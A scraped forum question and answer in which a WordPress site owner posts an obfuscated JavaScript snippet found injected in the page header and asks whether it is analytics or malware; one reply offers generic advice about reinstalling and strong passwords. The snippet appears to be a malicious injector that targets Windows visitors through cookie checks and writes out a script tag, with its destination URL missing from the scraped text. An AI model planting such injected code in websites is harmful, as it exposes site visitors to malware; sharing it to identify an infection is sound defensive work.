开发者

What is this? Google analytics cookie or malware?

开发者 https://www.devze.com 2023-01-13 04:49 出处:网络
I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

I have a WordPress installation that has been targeted quite heavily by a phishing operation. I thought I had the security mostly covered except I found this in the header:

var a=document.cookie;document.cookie="hop="+escape("hop")+";path=/";var b=navigator.appVersion,c=" "+document.cookie,d=null,e=0,f=0;if(c.length>0){e=c.indexOf(" hop=");if(e!=-1){e+=5;f=c.indexOf(";",e);if(f==-1)f=c.length;d=unescape(c.substring(e,f))}} if(d=="hop"&&b.toLowerCase().indexOf("win")!=-1&&a.indexOf("hip")==-1){var g=["keg","kei","ken","kep","kev","kex","key","khi","kid","kif"],h=Math.floor(Math.random()*g.length);dt=new Date;dt.setTime(dt.getTime()+8E7);document.cookie="开发者_运维知识库hip="+escape("hip")+";expires="+dt.toGMTString()+";path=/";document.write('</script>')};

That URL at the the end is super suspicious. I googled but found no leads :-(

I haven't yet found the source of the code in my WP installation. It's not written into the template files or database. In the process of updating WP install now.

Does anyone have any knowledge of this?


That looks strange to me. Maybe try reinstalling wordpress and choose very complex passwords so nobody unauthorized can access your site. You might want to remove the google analytics code from the page and see if that makes a difference. Complex passwords include numbers, uppercase and lowercase letters, slashes and anything else you can think of. Make sure it is longer then 8 letters. If your site is infected, take it down from the web NOW until your sure it's not.

0

精彩评论

暂无评论...
验证码 换一张
取 消